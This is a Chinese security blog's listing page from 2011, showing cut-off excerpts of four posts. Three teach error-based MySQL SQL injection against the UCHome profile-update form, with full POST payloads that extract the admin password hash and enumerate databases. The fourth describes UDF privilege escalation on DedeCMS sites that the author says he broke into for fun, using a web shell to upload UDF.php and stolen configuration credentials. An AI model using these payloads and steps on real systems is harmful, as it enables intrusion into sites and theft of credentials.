mysql暴错注入的科普 1

   
分类:安全 | 2011-08-20 | 撸过 1,111 次
0人扯蛋

抽uchome两个老的SQL注入漏洞举例,漏洞很久以前就被人公布过了,两个SQL注入都在个人资料更新的流程里:

 

注册变量的代码KEY的内容直接进入了$inserts数组

foreach ($_POST['friend'] as $key => $value) {

$value = intval($value);

$inserts[] = "('base','$key','$space[uid]','$value')";

}

直接进入INSERT语句的VALUES里

if($inserts) {

$_SGLOBAL['db']->query("DELE[......]

继续阅读

mysql暴错注入的科普 2

   
分类:安全 | 2011-08-20 | 撸过 927 次
0人扯蛋

通过前面SQL错误信息获得了表前缀,那么直接就可以爆用户名为admin的hash

向cp.php?ac=profile&op=info POST提交参数:
profilesubmit=1&formhash=232d1c54&info[a',(select 1 from(select count(*),concat((SELECT concat(password) FROM uchome_member where username like 'admin%'),floor(rand(0)*2))x from information_schema.tables group[......]

继续阅读

mysql暴错注入的科普 3

   
分类:安全 | 2011-08-20 | 撸过 956 次
0人扯蛋

 

跨库爆出uckey,跨库到ucenter进行查询,这里我就不详叙了,都截图吧。

 

 

爆出数据库的个数

profilesubmit=1&formhash=232d1c54&info[a',(select 1 from(select count(*),concat((SELECT concat(substring(count(*),1,64)) FROM information_schema.SCHEMATA),floor(rand(0)* 2))x from information_schema.tables group by x)[......]

继续阅读

Mysql UDF提权

   
分类:工具 | 2011-08-17 | 撸过 8,386 次
6人扯蛋

今天闲的无聊DEDECMS搞了几个站。没事做提权吧。真的很久很久没有玩这东西了。

测试经典的UDF.dll提权一次性成功。

dedecms的账号和密码都保存在data/common.inc.php里面;下载common.inc.php查看账号密码你懂的。

首先用菜刀上传UDF.php;然后输入账号密码啥的也就连接成功了。

作者:

二、适用场合:1.目标系统是Windows(Win2000,XP,Win2003);2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。

 

三、使用帮助[......]

继续阅读